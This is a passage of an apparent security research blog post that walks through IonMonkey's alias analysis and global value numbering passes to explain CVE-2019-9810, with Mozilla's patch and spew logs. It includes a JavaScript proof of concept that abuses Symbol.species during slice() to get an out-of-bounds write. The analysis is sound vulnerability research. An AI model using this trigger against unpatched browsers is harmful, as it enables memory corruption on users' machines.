  1. Every instruction is identified by an identifier, which is an integer starting from 0
  2. There are no variable names; if you want to reference the result of a previous instruction it creates a name by taking the name of the instruction concatenated with its identifier like unbox8 and unbox9 above. Those two references two unbox instructions identified by their identifiers 8 and 9:
08 | unbox parameter1 to Int32 (infallible)
09 | unbox parameter2 to Int32 (infallible)

That is all I wanted to cover in this little IonMonkey introduction - I hope it helps you wander around in the source-code and start investigating stuff on your own.

If you would like more content on the subject of Javascript JIT compilers, here is a list of links worth reading (they talk about different Javascript engine but the concepts are usually the same):

Let's have a look at alias analysis now :)

Diving into Alias Analysis

The purpose of this part is to understand more of the alias analysis pass which is the specific optimization pass that has been fixed by Mozilla. To understand it a bit more we will simply take small snippets of Javascript, observe the results in a debugger as well as following the source-code along. We will get back to the vulnerability a bit later when we understand more about what we are talking about :). A good way to follow this section along is to open a web-browser to this file/function: AliasAnalysis.cpp:analyze.

Let's start with simple.js defined as the below:

function x() {
    const a = [1,2,3,4];
    a.slice();
}

for(let Idx = 0; Idx < 10000; Idx++) {
    x();
}

Once x is compiled, we end up with the below MIR code after the AliasAnalysis pass has run (pass#09) (I annotated and cut some irrelevant parts):

...
08 | constant object 2cb22428f100 (Array)
09 | newarray constant8:Object
------------------------------------------------------ a[0] = 1
10 | constant 0x1
11 | constant 0x0
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
15 | constant 0x2
16 | constant 0x1
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
20 | constant 0x3
21 | constant 0x2
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
25 | constant 0x4
26 | constant 0x3
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
32 | constant 0x0
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32

The alias analysis is able to output a summary on the alias-sum channel and this is what it prints out when ran against x:

[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements12 marked depending on start4
[AliasSummaries]  elements17 marked depending on setinitializedlength14
[AliasSummaries]  elements22 marked depending on setinitializedlength19
[AliasSummaries]  elements27 marked depending on setinitializedlength24
[AliasSummaries]  elements33 marked depending on setinitializedlength29
[AliasSummaries]  arraylength34 marked depending on setinitializedlength29

OK, so that's kind of a lot for now so let's start at the beginning. Ion uses what they call alias set. You can see an alias set as an equivalence sets (term also used in compiler literature). Everything belonging to the same equivalence set may alias. Ion performs this analysis to determine potential dependencies between load and store instructions; that’s all it cares about. Alias information is used later in the pipeline to carry optimization such as redundancy elimination for example - more on that later.

// [SMDOC] IonMonkey Alias Analysis
//
// This pass annotates every load instruction with the last store instruction
// on which it depends. The algorithm is optimistic in that it ignores explicit
// dependencies and only considers loads and stores.
//
// Loads inside loops only have an implicit dependency on a store before the
// loop header if no instruction inside the loop body aliases it. To calculate
// this efficiently, we maintain a list of maybe-invariant loads and the
// combined alias set for all stores inside the loop. When we see the loop's
// backedge, this information is used to mark every load we wrongly assumed to
// be loop invariant as having an implicit dependency on the last instruction of
// the loop header, so that it's never moved before the loop header.
//
// The algorithm depends on the invariant that both control instructions and
// effectful instructions (stores) are never hoisted.

In Ion, instructions are free to provide refinement to their alias set by overloading getAliasSet; here are the various alias sets defined for every different MIR opcode that we encountered in the MIR code of x:

// A constant js::Value.
class MConstant : public MNullaryInstruction {
  AliasSet getAliasSet() const override { return AliasSet::None(); }
};

class MNewArray : public MUnaryInstruction, public NoTypePolicy::Data {
  // NewArray is marked as non-effectful because all our allocations are
  // either lazy when we are using "new Array(length)" or bounded by the
  // script or the stack size when we are using "new Array(...)" or "[...]"
  // notations.  So we might have to allocate the array twice if we bail
  // during the computation of the first element of the square braket
  // notation.
  virtual AliasSet getAliasSet() const override { return AliasSet::None(); }
};

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store a value to a dense array slots vector.
class MStoreElement
    : public MTernaryInstruction,
      public MStoreElementCommon,
      public MixPolicy<SingleObjectPolicy, NoFloatPolicy<2>>::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::Element);
  }
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
                              public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::ObjectFields);
  }
};

// Load the array length from an elements header.
class MArrayLength : public MUnaryInstruction, public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Array.prototype.slice on a dense array.
class MArraySlice : public MTernaryInstruction,
                    public MixPolicy<ObjectPolicy<0>, UnboxedInt32Policy<1>,
                                     UnboxedInt32Policy<2>>::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
  }
};

The analyze function ignores instruction that are associated with no alias set as you can see below..:

    for (MInstructionIterator def(block->begin()),
         end(block->begin(block->lastIns()));
         def != end; ++def) {
      def->setId(newId++);
      AliasSet set = def->getAliasSet();
      if (set.isNone()) {
        continue;
      }

..so let's simplify the MIR code by removing all the constant and newarray instructions to focus on what matters:

------------------------------------------------------ a[0] = 1
...
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
...
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
...
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
...
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32

In analyze, the stores vectors organize and keep track of every store instruction (any instruction that defines a Store() alias set) depending on their alias set; for example, if we run the analysis on the code above this is what the vectors would look like:

stores[AliasSet::Element]      = [13, 18, 23, 28, 35]
stores[AliasSet::ObjectFields] = [14, 19, 24, 29, 35]

This reads as instructions 13, 18, 23, 28 and 35 are store instruction in the AliasSet::Element alias set. Note that the instruction 35 not only alias AliasSet::Element but also AliasSet::ObjectFields.

Once the algorithm encounters a load instruction (any instruction that defines a Load() alias set), it wants to find the last store this load depends on, if any. To do so, it walks the stores vectors and evaluates the load instruction with the current store candidate (note that there is no need to walk the stores[AliasSet::Element vector if the load instruction does not even alias AliasSet::Element).

To establish a dependency link, obviously the two instructions don't only need to have alias set that intersects (Load(Any) intersects with Store(AliasSet::Element) for example). They also need to be operating on objects of the same type. This is what the function genericMightAlias tries to figure out: GetObject is used to grab the appropriate operands of the instruction (the one that references the object it is loading from / storing to), and objectsIntersect to do what its name suggests. The MayAlias analysis does two things:

  1. Check if two instructions have intersecting alias sets
    1. AliasSet::Load(AliasSet::Any) intersects with AliasSet::Store(AliasSet::Element)
  2. Check if these instructions operate on intersecting TypeSets
    1. GetObject is used to grab the appropriate operands off the instruction,
    2. Then get its TypeSet,
    3. And compute the intersection with objectsIntersect.
// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

  // Note: only return the object if that object owns that property.
  // I.e. the property isn't on the prototype chain.
  const MDefinition* object = nullptr;
  switch (ins->op()) {
    case MDefinition::Opcode::InitializedLength:
    // [...]
    case MDefinition::Opcode::Elements:
      object = ins->getOperand(0);
      break;
  }

  object = MaybeUnwrap(object);
  return object;
}

// Generic comparing if a load aliases a store using TI information.
MDefinition::AliasType AliasAnalysis::genericMightAlias(
    const MDefinition* load, const MDefinition* store) {
  const MDefinition* loadObject = GetObject(load);
  const MDefinition* storeObject = GetObject(store);
  if (!loadObject || !storeObject) {
    return MDefinition::AliasType::MayAlias;
  }

  if (!loadObject->resultTypeSet() || !storeObject->resultTypeSet()) {
    return MDefinition::AliasType::MayAlias;
  }

  if (loadObject->resultTypeSet()->objectsIntersect(
          storeObject->resultTypeSet())) {
    return MDefinition::AliasType::MayAlias;
  }

  return MDefinition::AliasType::NoAlias;
}

Now, let's try to walk through this algorithm step-by-step for a little bit. We start in AliasAnalysis::analyze and assume that the algorithm has already run for some time against the above MIR code. It just grabbed the load instruction 17 | elements newarray9:Object (has an Load() alias set). At this point, the stores vectors are expected to look like this:

stores[AliasSet::Element]      = [13]
stores[AliasSet::ObjectFields] = [14]

The next step of the algorithm now is to figure out if the current load is depending on a prior store. If it does, a dependency link is created between the two; if it doesn't it carries on.

To achieve this, it iterates through the stores vectors and evaluates the current load against every available candidate store (aliasedStores in AliasAnalysis::analyze). Of course it doesn't go through every vector, but only the ones that intersects with the alias set of the load instruction (there is no point to carry on if we already know off the bat that they don't even intersect).

In our case, the 17 | elements newarray9:Object can only alias with a store coming from store[AliasSet::ObjectFields] and so 14 | setinitializedlength elements12:Elements constant11:Int32 is selected as the current store candidate.

The next step is to know if the load instruction can alias with the store instruction. This is carried out by the function AliasAnalysis::genericMightAlias which returns either MayAlias or NoAlias.

The first stage is to understand if the load and store nodes even have anything related to each other. Keep in mind that those nodes are instructions with operands and as a result you cannot really tell if they are working on the same objects without looking at their operands. To extract the actual relevant object, it calls into GetObject which is basically a big switch case that picks the right operand depending on the instruction. As an example, for 17 | elements newarray9:Object, GetObject selects the first operand which is newarray9:Object.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

  // Note: only return the object if that object owns that property.
  // I.e. the property isn't on the prototype chain.
  const MDefinition* object = nullptr;
  switch (ins->op()) {
    // [...]
    case MDefinition::Opcode::Elements:
      object = ins->getOperand(0);
      break;
  }

  object = MaybeUnwrap(object);
  return object;
}

Once it has the operand, it goes through one last step to potentially unwrap the operand until finding the corresponding object.

// Unwrap any slot or element to its corresponding object.
static inline const MDefinition* MaybeUnwrap(const MDefinition* object) {
  while (object->isSlots() || object->isElements() ||
         object->isConvertElementsToDoubles()) {
    MOZ_ASSERT(object->numOperands() == 1);
    object = object->getOperand(0);
  }
  if (object->isTypedArrayElements()) {
    return nullptr;
  }
  if (object->isTypedObjectElements()) {
    return nullptr;
  }
  if (object->isConstantElements()) {
    return nullptr;
  }
  return object;
}

In our case newarray9:Object doesn't need any unwrapping as this is neither an MSlots / MElements / MConvertElementsToDoubles node. For the store candidate though, 14 | setinitializedlength elements12:Elements constant11:Int32, GetObject returns its first argument elements12 which isn't the actual 'root' object. This is when MaybeUnwrap is useful and grabs for us the first operand of 12 | elements newarray9:Object, newarray9 which is the root object. Cool.

Anyways, once we have our two objects, loadObject and storeObject we need to figure out if they are related. To do that, Ion uses a structure called a js::TemporaryTypeSet. My understanding is that a TypeSet completely describe the values that a particular value might have.

/*
 * [SMDOC] Type-Inference TypeSet
 *
 * Information about the set of types associated with an lvalue. There are
 * three kinds of type sets:
 *
 * - StackTypeSet are associated with TypeScripts, for arguments and values
 *   observed at property reads. These are implicitly frozen on compilation
 *   and only have constraints added to them which can trigger invalidation of
 *   TypeNewScript information.
 *
 * - HeapTypeSet are associated with the properties of ObjectGroups. These
 *   may have constraints added to them to trigger invalidation of either
 *   compiled code or TypeNewScript information.
 *
 * - TemporaryTypeSet are created during compilation and do not outlive
 *   that compilation.
 *
 * The contents of a type set completely describe the values that a particular
 * lvalue might have, except for the following cases:
 *
 * - If an object's prototype or class is dynamically mutated, its group will
 *   change. Type sets containing the old group will not necessarily contain
 *   the new group. When this occurs, the properties of the old and new group
 *   will both be marked as unknown, which will prevent Ion from optimizing
 *   based on the object's type information.
 *
 * - If an unboxed object is converted to a native object, its group will also
 *   change and type sets containing the old group will not necessarily contain
 *   the new group. Unlike the above case, this will not degrade property type
 *   information, but Ion will no longer optimize unboxed objects with the old
 *   group.
 */

As a reminder, in our case we have newarray9:Object as loadObject (extracted off 17 | elements newarray9:Object) and newarray9:Object (extracted off 14 | setinitializedlength elements12:Elements constant11:Int32 which is the store candidate). Their TypeSet intersects (they have the same one) and as a result this means genericMightAlias returns Alias::MayAlias.

If genericMightAlias returns MayAlias the caller AliasAnalysis::analyze invokes the method mightAlias on the def variable which is the load instruction. This method is a virtual method that can be overridden by instructions in which case they get a chance to specify a specific behavior there.

mightAlias

Otherwise, the basic implementation is provided by js::jit::MDefinition::mightAlias which basically re-checks that the alias sets do intersect (even though we already know that at this point):

  virtual AliasType mightAlias(const MDefinition* store) const {
    // Return whether this load may depend on the specified store, given
    // that the alias sets intersect. This may be refined to exclude
    // possible aliasing in cases where alias set flags are too imprecise.
    if (!(getAliasSet().flags() & store->getAliasSet().flags())) {
      return AliasType::NoAlias;
    }
    MOZ_ASSERT(!isEffectful() && store->isEffectful());
    return AliasType::MayAlias;
  }

As a reminder, in our case, the load instruction has the alias set Load(AliasSet::ObjectFields), and the store instruction has the alias set Store(AliasSet::ObjectFields)) as you can see below.

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
                              public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::ObjectFields);
  }
};

We are nearly done but... the algorithm doesn't quite end just yet though. It keeps iterating through the store candidates as it is only interested in the most recent store (lastStore in AliasAnalysis::analyze) and not a store as you can see below.

// Find the most recent store on which this instruction depends.
MInstruction* lastStore = firstIns;
for (AliasSetIterator iter(set); iter; iter++) {
    MInstructionVector& aliasedStores = stores[*iter];
    for (int i = aliasedStores.length() - 1; i >= 0; i--) {
        MInstruction* store = aliasedStores[i];
        if (genericMightAlias(*def, store) !=
            MDefinition::AliasType::NoAlias &&
            def->mightAlias(store) != MDefinition::AliasType::NoAlias &&
            BlockMightReach(store->block(), *block)) {
            if (lastStore->id() < store->id()) {
                lastStore = store;
            }
            break;
        }
    }
}
def->setDependency(lastStore);
IonSpewDependency(*def, lastStore, "depends", "");

In our simple example, this is the only candidate so we do have what we are looking for :). And so a dependency is born..!

Of course we can also ensure that this result is shown in Ion's spew (with both alias and alias-sum channels turned on):

Processing store setinitializedlength14 (flags 1)
Load elements17 depends on store setinitializedlength14 ()
...
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements17 marked depending on setinitializedlength14

Great :).

At this point, we have an OK understanding of what is going on and what type of information the algorithm is looking for. What is also interesting is that the pass actually doesn't transform the MIR graph at all, it just analyzes it. Here is a small recap on how the analysis pass works against our code:

It iterates over the instructions in the basic block and only cares about store and load instructions If the instruction is a store, it gets added to a vector to keep track of it If the instruction is a load, it evaluates it against every store in the vector If the load and the store MayAlias a dependency link is created between them mightAlias checks the intersection of both AliasSet genericMayAlias checks the intersection of both TypeSet If the engine can prove that there is NoAlias possible then this algorithm carries on

Even though the root-cause of the bug might be in there, we still need to have a look at what comes next in the optimization pipeline in order to understand how the results of this analysis are consumed. We can also expect that some of the following passes actually transform the graph which will introduce the exploitable behavior.

Analysis of the patch

Now that we have a basic understanding of the Alias Analysis pass and some background information about how Ion works, it is time to get back to the problem we are trying to solve: what happens in CVE-2019-9810?

First things first: Mozilla fixed the issue by removing the alias set refinement done for the arrayslice instruction which will ensure creation of dependencies between arrayslice and loads instruction (which also means less opportunity for optimization):

# HG changeset patch
# User Jan de Mooij <[email protected]>
# Date 1553190741 0
# Node ID 229759a67f4f26ccde9f7bde5423cfd82b216fa2
# Parent  feda786b35cb748e16ef84b02c35fd12bd151db6
Bug 1537924 - Simplify some alias sets in Ion. r=tcampbell, a=dveditz

Differential Revision: https://phabricator.services.mozilla.com/D24400

diff --git a/js/src/jit/AliasAnalysis.cpp b/js/src/jit/AliasAnalysis.cpp
--- a/js/src/jit/AliasAnalysis.cpp
+++ b/js/src/jit/AliasAnalysis.cpp
@@ -128,17 +128,16 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::MaybeCopyElementsForWrite:
     case MDefinition::Opcode::MaybeToDoubleElement:
     case MDefinition::Opcode::TypedArrayLength:
     case MDefinition::Opcode::TypedArrayByteOffset:
     case MDefinition::Opcode::SetTypedObjectOffset:
     case MDefinition::Opcode::SetDisjointTypedElements:
     case MDefinition::Opcode::ArrayPopShift:
     case MDefinition::Opcode::ArrayPush:
-    case MDefinition::Opcode::ArraySlice:
     case MDefinition::Opcode::LoadTypedArrayElementHole:
     case MDefinition::Opcode::StoreTypedArrayElementHole:
     case MDefinition::Opcode::LoadFixedSlot:
     case MDefinition::Opcode::LoadFixedSlotAndUnbox:
     case MDefinition::Opcode::StoreFixedSlot:
     case MDefinition::Opcode::GetPropertyPolymorphic:
     case MDefinition::Opcode::SetPropertyPolymorphic:
     case MDefinition::Opcode::GuardShape:
@@ -153,16 +152,17 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::LoadElementHole:
     case MDefinition::Opcode::TypedArrayElements:
     case MDefinition::Opcode::TypedObjectElements:
     case MDefinition::Opcode::CopyLexicalEnvironmentObject:
     case MDefinition::Opcode::IsPackedArray:
       object = ins->getOperand(0);
       break;
     case MDefinition::Opcode::GetPropertyCache:
+    case MDefinition::Opcode::CallGetProperty:
     case MDefinition::Opcode::GetDOMProperty:
     case MDefinition::Opcode::GetDOMMember:
     case MDefinition::Opcode::Call:
     case MDefinition::Opcode::Compare:
     case MDefinition::Opcode::GetArgumentsObjectArg:
     case MDefinition::Opcode::SetArgumentsObjectArg:
     case MDefinition::Opcode::GetFrameArgument:
     case MDefinition::Opcode::SetFrameArgument:
@@ -179,16 +179,17 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::WasmAtomicExchangeHeap:
     case MDefinition::Opcode::WasmLoadGlobalVar:
     case MDefinition::Opcode::WasmLoadGlobalCell:
     case MDefinition::Opcode::WasmStoreGlobalVar:
     case MDefinition::Opcode::WasmStoreGlobalCell:
     case MDefinition::Opcode::WasmLoadRef:
     case MDefinition::Opcode::WasmStoreRef:
     case MDefinition::Opcode::ArrayJoin:
+    case MDefinition::Opcode::ArraySlice:
       return nullptr;
     default:
 #ifdef DEBUG
       // Crash when the default aliasSet is overriden, but when not added in the
       // list above.
       if (!ins->getAliasSet().isStore() ||
           ins->getAliasSet().flags() != AliasSet::Flag::Any) {
         MOZ_CRASH(
diff --git a/js/src/jit/MIR.h b/js/src/jit/MIR.h
--- a/js/src/jit/MIR.h
+++ b/js/src/jit/MIR.h
@@ -8077,19 +8077,16 @@ class MArraySlice : public MTernaryInstr
   INSTRUCTION_HEADER(ArraySlice)
   TRIVIAL_NEW_WRAPPERS
   NAMED_OPERANDS((0, object), (1, begin), (2, end))

   JSObject* templateObj() const { return templateObj_; }

   gc::InitialHeap initialHeap() const { return initialHeap_; }

-  AliasSet getAliasSet() const override {
-    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
-  }
   bool possiblyCalls() const override { return true; }
   bool appendRoots(MRootList& roots) const override {
     return roots.append(templateObj_);
   }
 };

 class MArrayJoin : public MBinaryInstruction,
                    public MixPolicy<ObjectPolicy<0>, StringPolicy<1>>::Data {
@@ -9660,17 +9657,18 @@ class MCallGetProperty : public MUnaryIn
   // Constructors need to perform a GetProp on the function prototype.
   // Since getters cannot be set on the prototype, fetching is non-effectful.
   // The operation may be safely repeated in case of bailout.
   void setIdempotent() { idempotent_ = true; }
   AliasSet getAliasSet() const override {
     if (!idempotent_) {
       return AliasSet::Store(AliasSet::Any);
     }
-    return AliasSet::None();
+    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
+                          AliasSet::DynamicSlot);
   }
   bool possiblyCalls() const override { return true; }
   bool appendRoots(MRootList& roots) const override {
     return roots.append(name_);
   }
 };

 // Inline call to handle lhs[rhs]. The first input is a Value so that this

The instructions that don't define any refinements inherit the default behavior from js::jit::MDefinition::getAliasSet (both jit::MInstruction and jit::MPhi nodes inherit jit::MDefinition):

virtual AliasSet getAliasSet() const {
  // Instructions are effectful by default.
  return AliasSet::Store(AliasSet::Any);
}

Just one more thing before getting back into Ion; here is the PoC file I use if you would like to follow along at home:

let Trigger = false;
let Arr = null;
let Spray = [];

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x30, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBBBBBBBB);
}

main();

It’s usually a good idea to compare the behavior of the patched component before and after the fix. The below shows the summary of the alias analysis pass without the fix and with it (alias-sum spew channel):

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

What you quickly notice is that in the fixed version there are a bunch of new load / store dependencies against the .slice statement (which translates to an arrayslice MIR instruction). As we can see in the fix for this issue, the developer basically disabled any alias set refinement and basically opt-ed out the arrayslice instruction off the alias analysis. If we take a look at the MIR graph of the Target function on a vulnerable build that is what we see (on pass#9 Alias analysis and on pass#10 GVN):

summary

Let's first start with what the MIR graph looks like after the Alias Analysis pass. The code is pretty straight-forward to go through and is basically broken down into three pieces as the original JavaScript code:

  • The first step is to basically load up the Arr variable, converts the index Idx into an actual integer (tonumberint32), gets the length (it's not quite the length but it doesn't matter for now) of the array (initializedLength) and finally ensures that the index is within Arr's bounds.
  • Then, it invokes the slice operation (arrayslice) against the Special array passed in the first argument of the function.
  • Finally, like in the first step we have another set of instructions that basically do the same but this time to write a different value (passed in the third argument of the function).

This sounds like a pretty fair translation from the original code. Now, let's focus on the arrayslice instruction for a minute. In the previous section we have looked at what the Alias Analysis does and how it does it. In this case, if we look at the set of instructions coming after the 27 | arrayslice unbox9:Object constant24:Int32 arraylength26:Int32 we do not see another instruction that loads anything related to the unbox9:Object and as a result it means all those other instructions have no dependency to the slice operation. In the fixed version, even though we get the same MIR code, because the alias set for the arrayslice instruction is now Store(Any) combined with the fact that GetObject instead of grabbing its first operand it returns null, this makes genericMightAlias returns Alias::MayAlias. If the engine cannot prove no aliasing then it stays conservative and creates a dependency. That’s what explains this part in the alias-sum channel for the fixed version:

...
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

Now looking at the graph after the GVN pass has executed we can start to see that the graph has been simplified / modified. One of the things that sounds pretty natural, is to basically eliminate a good part of the green block as it is mostly a duplicate of the blue block, and as a result only the storeelement instruction is conserved. This is safe based on the assumption that Arr cannot be changed in between. Less code, one bound check instead of two is also a good thing for code size and runtime performance which is Ion's ultimate goal.

At first sight, this might sound like a good and safe thing to do. JavaScript being JavaScript though, it turns out that if an attacker subclasses Array and provides an implementation for [Symbol.Species], it can redefine the ctor of the Array object. That coupled with the fact that slicing a JavaScript array results in a newly built array, you get the opportunity to do badness here. For example, we can set Arr's length to zero and because the bounds check happens only at the beginning of the function, we can modify its length after the 19 | boundscheck and before 36 | storeelement. If we do that, 36 effectively gives us the ability to write an Int32 out of Arr's bounds. Beautiful.

Implementing what is described above is pretty easy and here is the code for it:

let Trigger = false;
class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
        };
    }
};

The Trigger variable allows us to control the behavior of SoSpecial's ctor and decide when to trigger the resizing of the array.

One important thing that we glossed over in this section is the relationship between the alias analysis results and how those results are consumed by the GVN pass. So as usual, let’s pop the hood and have a look at what actually happens :).

Global Value Numbering

The pass that follows Alias Analysis in Ion’s pipeline is the Global Value Numbering. (abbreviated GVN) which is implemented in the ValueNumbering.cpp file:

  // Optimize the graph, performing expression simplification and
  // canonicalization, eliminating statically fully-redundant expressions,
  // deleting dead instructions, and removing unreachable blocks.
  MOZ_MUST_USE bool run(UpdateAliasAnalysisFlag updateAliasAnalysis);

The interesting part in this comment for us is the eliminating statically fully-redundant expressions part because what if we can have it incorrectly eliminate a supposedly redundant bounds check for example?

The pass itself isn’t as small as the alias analysis and looks more complicated. So we won’t follow the algorithm line by line like above but instead I am just going to try to give you an idea of the type of modification of the graph it can do. And more importantly, how does it use the dependencies established in the previous pass. We are lucky because this optimization pass is the only pass documented on Mozilla’s wiki which is great as it’s going to simplify things for us: IonMonkey/Global value numbering.

By reading the wiki page we learn a few interesting things. First, each instruction is free to opt-into GVN by providing an implementation for congruentTo and foldsTo. The default implementations of those functions are inherited from js::jit::MDefinition:

virtual bool congruentTo(const MDefinition* ins) const { return false; }
MDefinition* MDefinition::foldsTo(TempAllocator& alloc) {
  // In the default case, there are no constants to fold.
  return this;
}

The congruentTo function evaluates if the current instruction is identical to the instruction passed in argument. If they are it means one can be eliminated and replaced by the other one. The other one gets discarded and the MIR code gets smaller and simpler. This is pretty intuitive and easy to understand. As the name suggests, the foldsTo function is commonly used (but not only) for constant folding in which case it computes and creates a new MIR node that it returns. In default case, the implementation returns this which doesn’t change the node in the graph.

Another good source of help is to turn on the gvn spew channel which is useful to follow the code and what it does; here’s what it looks like:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
[GVN]       Recording Constant4
[GVN]       Replacing Constant5 with Constant4
[GVN]       Discarding dead Constant5
[GVN]       Replacing Constant8 with Constant4
[GVN]       Discarding dead Constant8
[GVN]       Recording Unbox9
[GVN]       Recording Unbox10
[GVN]       Recording Unbox11
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording LoadSlot14
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Discarding dead ToNumberInt3216
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording SpectreMaskIndex20
[GVN]       Discarding dead Constant22
[GVN]       Discarding dead Constant23
[GVN]       Recording Constant24
[GVN]       Recording Elements25
[GVN]       Recording ArrayLength26
[GVN]       Replacing Constant28 with Constant12
[GVN]       Discarding dead Constant28
[GVN]       Replacing Slots29 with Slots13
[GVN]       Discarding dead Slots29
[GVN]       Replacing LoadSlot30 with LoadSlot14
[GVN]       Discarding dead LoadSlot30
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Discarding dead ToNumberInt3231
[GVN]       Replacing Elements32 with Elements17
[GVN]       Discarding dead Elements32
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Discarding dead InitializedLength33
[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Discarding dead BoundsCheck34
[GVN]       Replacing SpectreMaskIndex35 with SpectreMaskIndex20
[GVN]       Discarding dead SpectreMaskIndex35
[GVN]       Recording Box37

At a high level, the pass iterates through the various instructions of our block and looks for opportunities to eliminate redundancies (congruentTo) and folds expressions (foldsTo). The logic that decides if two instructions are equivalent is in js::jit::ValueNumberer::VisibleValues::ValueHasher::match:

// Test whether two MDefinitions are congruent.
bool ValueNumberer::VisibleValues::ValueHasher::match(Key k, Lookup l) {
  // If one of the instructions depends on a store, and the other instruction
  // does not depend on the same store, the instructions are not congruent.
  if (k->dependency() != l->dependency()) {
    return false;
  }
  bool congruent =
      k->congruentTo(l);  // Ask the values themselves what they think.
#ifdef JS_JITSPEW
  if (congruent != l->congruentTo(k)) {
    JitSpew(
        JitSpew_GVN,
        "      congruentTo relation is not symmetric between %s%u and %s%u!!",
        k->opName(), k->id(), l->opName(), l->id());
  }
#endif
  return congruent;
}

Before invoking the instructions’ congruentTo implementation the algorithm verifies if the two instructions share the same dependency. This is this very line that ties together the alias analysis result and the global value numbering optimization; pretty exciting uh :)?.

